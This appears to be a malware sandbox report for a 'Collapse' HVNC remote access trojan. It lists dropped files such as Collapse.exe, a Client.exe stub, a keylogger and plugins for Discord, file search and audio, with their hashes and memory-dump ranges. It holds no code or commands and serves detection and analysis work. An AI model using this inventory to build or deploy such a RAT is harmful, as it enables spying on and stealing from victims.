C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe

MD5 a2254ef4b20b21a3e1dcb7318217cadf
SHA1 8fb7e8e489f34968bf3bb26857208f392911b6d6
SHA256 3c2caf7af685cb69b81d9469afbbbb397ca4480f61c7363ea711c5a11781ed18
SHA512 bd6bf9d3fc86c830eb10f2456b15f8d4c3d3da154b8b9c80eed22e30275310b0820136e96cc2fe0e06a0f57be8a5dc1ec85fd7fd0d64b62de4bee3f4697b3ef0

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe

MD5 a2254ef4b20b21a3e1dcb7318217cadf
SHA1 8fb7e8e489f34968bf3bb26857208f392911b6d6
SHA256 3c2caf7af685cb69b81d9469afbbbb397ca4480f61c7363ea711c5a11781ed18
SHA512 bd6bf9d3fc86c830eb10f2456b15f8d4c3d3da154b8b9c80eed22e30275310b0820136e96cc2fe0e06a0f57be8a5dc1ec85fd7fd0d64b62de4bee3f4697b3ef0

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe.config

MD5 b8b7f83b3291d497e37b8117a59facf1
SHA1 677353bfafdcb73f194826f99b1450aa343ed40f
SHA256 a3ff6fdc656bb0a36df5e3da671cc649dc57a38cd8b9b0063c547bfd58b0c650
SHA512 87176764801f63b6102d0981f2e08b5f5cd5ba3c030196a25293cc9ee681acc8175adc6880248f579b91e28f503e6a237e94bd2c0cbef5d3ca44f692dddf7427

memory/2844-281-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp

memory/2844-282-0x0000029A22CE0000-0x0000029A24506000-memory.dmp

memory/2844-283-0x0000029A26090000-0x0000029A260A2000-memory.dmp

memory/2844-284-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Siticone.Desktop.UI.dll

MD5 1582aa45d981e0e569c6e05698642b30
SHA1 763506f312a186c55a04ef6a16ad7e867c394097
SHA256 21eecaf504b7fe787a45f4aa8f8f36dacfc3ab1d75624dfb41827cdef2a9a589
SHA512 278a7a4e2b9d82528200b9f92244db3f228187d15c36fd169deb927e343bc4d0bb29c9dba496f86558aea4f4deb44d1e47a41d5598c0b375d99ad9fbe99cec34

memory/2844-286-0x0000029A3F150000-0x0000029A3F556000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Guna.UI2.dll

MD5 1915011997fdb9aa95f15e567f4e6070
SHA1 40a7853f14d6d4919279965f026d57cf9a104998
SHA256 952fa59d3d6d8c8c5fad8a1144e5effdf0fa92d58db1fb2a2899faf84c6273ab
SHA512 5cca71b42ed9dc154e6d5919e7cd93046168781a55c051818157848efc918b2e4dd92f422eb1c47e0940b645ba750facf83bce240748a8170ac8ce0afc9efa90

memory/2844-288-0x0000029A3EF40000-0x0000029A3F136000-memory.dmp

memory/2844-289-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-290-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-291-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-292-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp

memory/2844-293-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-294-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-295-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-296-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-297-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-298-0x0000029A3EBE0000-0x0000029A3EC1C000-memory.dmp

memory/2844-300-0x0000029A40D60000-0x0000029A40FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\cGeoIp.dll

MD5 6d6e172e7965d1250a4a6f8a0513aa9f
SHA1 b0fd4f64e837f48682874251c93258ee2cbcad2b
SHA256 d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0
SHA512 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155

memory/2844-303-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\ServerCertificate.p12

MD5 6ce85262afbc028314bdf6fe9aa718a5
SHA1 b59fe71c2ebd80df9e3ba5681ff6e36c90c2f0a8
SHA256 74eba079b36c835cd89af395cf53272c53351cd851efb140a8152410c4e2973e
SHA512 8ac1198de48c3acab03482958ccd5044561599373338f0bb9ff203c0d596b810143d420ebdcb20abd60a1383a08e70f7ddac6fa9b304a0a3a61aa06af030e6fb

memory/2844-309-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-310-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

memory/2844-311-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\dnlib.dll

MD5 5cc2bb48b5e8c8ac0b99669401d15456
SHA1 02e9ae08f3ec364834eb3ffc122f1c90e1b0e95e
SHA256 648950f725fb0320e09c52dcaf81764916df96dc62e7429ba67daea0acb784ea
SHA512 2867e94cee9f89f1cf85ad01083d75f4bc0bc0e551b2ffae05581828994f2b01a458ac7a7c94a45e8c40858ecce197f7ec23482ee13ef3f1bf82b33b89b3b420

memory/2844-314-0x000002A245070000-0x000002A245194000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Stub\Client.exe

MD5 f5c75c1d8cdb213c46d6cb1e50178ac2
SHA1 7a60f6aca8b06c46518d26ae9f7c321f312816a7
SHA256 ff1593d664038b0c727f5a4772980f3dee659d315bbbf1b62b27c12696b42109
SHA512 0d602f4e9fbda3c9e219cf507917bae9527581d8d341d20523b3dcc756d9b2244485937bac793a16489fec4d22a618249009a515ed63ad1e25fd87308fbf3698

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Keylogger.exe

MD5 b8607b7921cd9cba78058fcb56bcfb9d
SHA1 1344f12ff7e23122b62fcc7f3be548c73d3c3efd
SHA256 b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c
SHA512 dd36040e57f2744437684e257caac0987a90deac0a60536f1cb8d690e256505d427931a3beb8d58f87c2c1bf5beb0a40c4b09417c451a07e5856044efbac1449

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\DevExpress.WinRTPresenter.Launcher.exe

MD5 de4449ac523ac31f66efe7f090360f71
SHA1 de7fcb8c16c7cab8255b8e31781efb0ffc45acce
SHA256 76a868948e5b4df73f5dab5606135f6bf10b598bdaa991737224edcb8fdd58db
SHA512 d43021c5878f08c38264e1882313959aa51b8dabf6649a64f476f3e7c0ba7fdaaac0f3edaa6fb3ea2e56889a5e78791236c1dfe8dbcd9218d7eab30a9ee4a56c

C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config

MD5 416afa3ab63684bfbb2fc0d627741358
SHA1 9a9daaf75cc63cabb33cdf9a21d2c55e72dfffef
SHA256 ae9bbbf6afc70f293f51fe103f9e8f65d5146eec86a20f3b746611549a065138
SHA512 742f19b3cb870c6e819449a285344358c3698d26519c2d151a24d1c13ce90cb5a452cb0b399969ce63546da3d0f5d5e012cc19ff9bc0ba0396f310c748ffe4d0

C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config

MD5 9f7263447a7147f27794207b622e7bed
SHA1 fb237d0308cd229b53ebdd1fac800c2d2e8eb0fb
SHA256 630731e94e34a01060cca637ea1bac6bec99bb7eaa4d747910e6cc166890149e
SHA512 a4e8f23db0c73e198e127cdff38507b4173701b99fdfc6bb3af62f398247d368c8208ac9177f710709d0692a47d4f96239e494054244a5373ce4395dfc63ea48

C:\Users\Admin\Desktop\Client.exe

MD5 806c4a1e3eb79086789467aba1721627
SHA1 6fd6541ac570c661f538c505180925c71cc29642
SHA256 f236915f94b0cd07caf0b94c38a977c57d5eafc24a36895f91d74fb63d44f928
SHA512 57d234990fd1e93fcd0dbc0cb11b1c02d48067326626b9a84d0e135986d9503397133d6180436a55b9948e4a34d4553ba5575d8a2a83636813d6ddea4cc1d6b0

C:\Users\Admin\Desktop\Client.exe

MD5 806c4a1e3eb79086789467aba1721627
SHA1 6fd6541ac570c661f538c505180925c71cc29642
SHA256 f236915f94b0cd07caf0b94c38a977c57d5eafc24a36895f91d74fb63d44f928
SHA512 57d234990fd1e93fcd0dbc0cb11b1c02d48067326626b9a84d0e135986d9503397133d6180436a55b9948e4a34d4553ba5575d8a2a83636813d6ddea4cc1d6b0

memory/1152-336-0x0000000000C50000-0x0000000000C66000-memory.dmp

memory/1152-337-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp

memory/1152-338-0x000000001B900000-0x000000001B910000-memory.dmp

memory/2844-340-0x0000029A41320000-0x0000029A4132A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\IP2Region.dll

MD5 cd5a0b0d309fd5837ddacbf4c1a65cda
SHA1 65fbc931f4ba8c5e3b26719665ee9ea6015f402c
SHA256 b0c2a6951dae794c210fbe68d7f42081e5da0f7cbb926cf986c3d453f9920f37
SHA512 84e4e1aa3f6c3014b39b0ac0da3db41e086dfab4e7d38a154f0ff2d0c65bae87039175e54cf950a57f21f5c56c19a62d6f98b2143f14a21d743867a2b37243aa

memory/1152-344-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp

memory/1152-345-0x000000001B900000-0x000000001B910000-memory.dmp

memory/2844-348-0x000002A244B60000-0x000002A244C60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Fun.dll

MD5 6498fbaa8d0f46e9cc7eb5350db0d226
SHA1 2b6502e636cf3a307fdd9417c33215e95fe133ce
SHA256 1aacbe29bc2ba2fa3b23e632ba4d0f31b21d9b7517230af75b943eed06e42c10
SHA512 3df2476cff49da2e322693ff5751d8cbbbffa03e063e9a74b3141e95f99e03a6ddc84d4ded4d2bd28937135e73615f6b9d810741a864d196c7aab4089d744c6e

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Discord.dll

MD5 7a9892f86badfa7560fd9182a775fb73
SHA1 4ac58c122bdf7ad51e3ba8ff6151b545a258ec34
SHA256 84c4a1f90507955ce9ff3e8c260bbacdb57b4d230853d2fe1379fdbc98938c7b
SHA512 6b646d83011444972c8b9b38f886035d4bef498d40299ebc3f80da1fc7b3d3b02fbdff1fb355574059f1a6309ebaeeba7aa8f7aa26c99b7452bcaa1ad04259ec

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileSearcher.dll

MD5 965f3d108d5995ba6214b32ce416d669
SHA1 3c2c219e053b3a692e37a59cd28db702da2af8d9
SHA256 05ee33a9f85545c43fbab3443751cdd0b151147f4665cfd3a661bae610b8e6b0
SHA512 f6d041219f5f5f1ee270812e5b4565465ce7c245636661d296a4dbd93b672bf1c3eaff890f84766c8f6b81ca14d5680e9bf8ed0c8a470018733c38dcb3897753

memory/1152-355-0x000000001DBA0000-0x000000001DC16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileManager.dll

MD5 5d429feae7e6513205802ccdd0012a90
SHA1 0262c5caa56e33af56ac1e2799bfe9fd5f4f5977
SHA256 b2417948b649d6575597e82c87903a83b0d575776180b5aa3f4c2fb03504b488
SHA512 db865c7262330818682e3d6a011e07ff6b79c70ba3507e1206cbf2b88b9d9e4bbf888384b71ce27993296c21f2a883aa8de6f435aaf9a7a8a6e8a2c80720b468

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Extra.dll

MD5 f5bf218ad015cae03530be7c8f0868a9
SHA1 d47c3936fded28dd4330f1aac7881d8bb17a1d02
SHA256 42b16d214b9336027c3e854c119739fac4cceac6e91045f69d1db18144b538bd
SHA512 a6c5a0cf8834de88b8df202c94de30521af3e7f8edfa213e896dac1c03096faa128fa38555bd9683d3d5819cdd34572f7cf061b9f841b823e13db9325cb5f090

memory/1152-356-0x000000001BDB0000-0x000000001BDBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Audio.dll

MD5 c16fccda2cdcf374df662c8035ed287c
SHA1 ed32b20dde3c884d80eab36a7096fbcb9432fbeb
SHA256 158e664b0976c0ae9594d7f57ff44ba298ca50dcf43fcdb76df5ff1893537800
SHA512 50a8b94b4089f59113a92033f685aa8037131d96423d412b53326a1c9f46529654e0776858977aae1448b4be3b16cd83c9eda5cf5352464a156f2343ff7c5480

memory/1152-357-0x000000001DB20000-0x000000001DB3E000-memory.dmp

memory/2844-358-0x000002A244B60000-0x000002A244C60000-memory.dmp